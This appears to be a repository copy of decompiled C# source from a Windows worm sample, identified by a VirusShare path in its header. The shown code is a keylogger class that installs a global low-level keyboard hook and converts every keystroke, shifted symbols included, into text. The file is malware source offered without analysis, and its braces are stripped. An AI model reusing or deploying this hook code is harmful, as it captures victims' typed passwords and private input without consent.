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synced 2025-02-07 07:21:58 +00:00
217 lines
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217 lines
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// Decompiled with JetBrains decompiler
// Type: clannad
// Assembly: Stub, Version=, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Windows.Forms;
public class clannad
private static int Key;
private static clannad.KDel KHD;
public clannad()
[DllImport("user32", EntryPoint = "SetWindowsHookExA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int SetWindowsHookEx(
int Hook,
clannad.KDel KeyDelegate,
int HMod,
int ThreadId);
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int CallNextHookEx(
int Hook,
int nCode,
int wParam,
ref clannad.KeyStructure lParam);
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int UnhookWindowsHookEx(int Hook);
public static event clannad.DownEventHandler Down;
public static event clannad.UpEventHandler Up;
public void CreateHook()
clannad.KHD = new clannad.KDel(this.Proc);
clannad.Key = clannad.SetWindowsHookEx(13, clannad.KHD, Marshal.GetHINSTANCE(Assembly.GetExecutingAssembly().GetModules()[0]).ToInt32(), 0);
private int Proc(int Code, int wParam, ref clannad.KeyStructure lParam)
if (Code == 0)
switch (wParam)
case 256:
case 260:
clannad.DownEventHandler downEvent = clannad.DownEvent;
if (downEvent != null)
downEvent(this.Feed((Keys) lParam.Code));
case 257:
case 261:
clannad.UpEventHandler upEvent = clannad.UpEvent;
if (upEvent != null)
upEvent(this.Feed((Keys) lParam.Code));
return clannad.CallNextHookEx(clannad.Key, Code, wParam, ref lParam);
public void DiposeHook()
// ISSUE: explicit finalizer call
private string Feed(Keys e)
Keys keys = e;
if (keys >= Keys.A && keys <= Keys.Z)
return Control.IsKeyLocked(Keys.Capital) | (Control.ModifierKeys & Keys.Shift) != Keys.None ? e.ToString() : e.ToString().ToLower();
if (keys >= Keys.D0 && keys <= Keys.D9)
if ((Control.ModifierKeys & Keys.Shift) == Keys.None)
return e.ToString().Replace("D", (string) null);
string Left = e.ToString();
if (Operators.CompareString(Left, "D1", false) == 0)
return "!";
if (Operators.CompareString(Left, "D2", false) == 0)
return "@";
if (Operators.CompareString(Left, "D3", false) == 0)
return "#";
if (Operators.CompareString(Left, "D4", false) == 0)
return "$";
if (Operators.CompareString(Left, "D5", false) == 0)
return "%";
if (Operators.CompareString(Left, "D6", false) == 0)
return "^";
if (Operators.CompareString(Left, "D7", false) == 0)
return "&";
if (Operators.CompareString(Left, "D8", false) == 0)
return "*";
if (Operators.CompareString(Left, "D9", false) == 0)
return "(";
if (Operators.CompareString(Left, "D0", false) == 0)
return ")";
if (keys >= Keys.NumPad0 && keys <= Keys.NumPad9)
return e.ToString().Replace("NumPad", (string) null);
if (keys >= Keys.Multiply && keys <= Keys.Divide)
string Left = e.ToString();
if (Operators.CompareString(Left, "Divide", false) == 0)
return "/";
if (Operators.CompareString(Left, "Multiply", false) == 0)
return "*";
if (Operators.CompareString(Left, "Subtract", false) == 0)
return "-";
if (Operators.CompareString(Left, "Add", false) == 0)
return "+";
if (Operators.CompareString(Left, "Decimal", false) == 0)
return ".";
if (keys == Keys.Space)
return " ";
if (keys >= Keys.OemSemicolon && keys <= Keys.OemQuotes)
if ((Control.ModifierKeys & Keys.Shift) != Keys.None)
string Left = e.ToString();
if (Operators.CompareString(Left, "OemMinus", false) == 0)
return "_";
if (Operators.CompareString(Left, "Oemplus", false) == 0)
return "+";
if (Operators.CompareString(Left, "OemOpenBrackets", false) == 0)
return "{";
if (Operators.CompareString(Left, "Oem6", false) == 0)
return "}";
if (Operators.CompareString(Left, "Oem5", false) == 0)
return "|";
if (Operators.CompareString(Left, "Oem1", false) == 0)
return ":";
if (Operators.CompareString(Left, "Oem7", false) == 0)
return "\"";
if (Operators.CompareString(Left, "Oemcomma", false) == 0)
return "<";
if (Operators.CompareString(Left, "OemPeriod", false) == 0)
return ">";
if (Operators.CompareString(Left, "OemQuestion", false) == 0)
return "?";
if (Operators.CompareString(Left, "Oemtilde", false) == 0)
return "~";
string Left = e.ToString();
if (Operators.CompareString(Left, "OemMinus", false) == 0)
return "-";
if (Operators.CompareString(Left, "Oemplus", false) == 0)
return "=";
if (Operators.CompareString(Left, "OemOpenBrackets", false) == 0)
return "[";
if (Operators.CompareString(Left, "Oem6", false) == 0)
return "]";
if (Operators.CompareString(Left, "Oem5", false) == 0)
return "\\";
if (Operators.CompareString(Left, "Oem1", false) == 0)
return ";";
if (Operators.CompareString(Left, "Oem7", false) == 0)
return "'";
if (Operators.CompareString(Left, "Oemcomma", false) == 0)
return ",";
if (Operators.CompareString(Left, "OemPeriod", false) == 0)
return ".";
if (Operators.CompareString(Left, "OemQuestion", false) == 0)
return "/";
if (Operators.CompareString(Left, "Oemtilde", false) == 0)
return "`";
return keys == Keys.Return ? Environment.NewLine : "<" + e.ToString() + ">";
return (string) null;
private delegate int KDel(int nCode, int wParam, ref clannad.KeyStructure lParam);
public delegate void DownEventHandler(string Key);
public delegate void UpEventHandler(string Key);
private struct KeyStructure
public int Code;
public int ScanCode;
public int Flags;
public int Time;
public int ExtraInfo;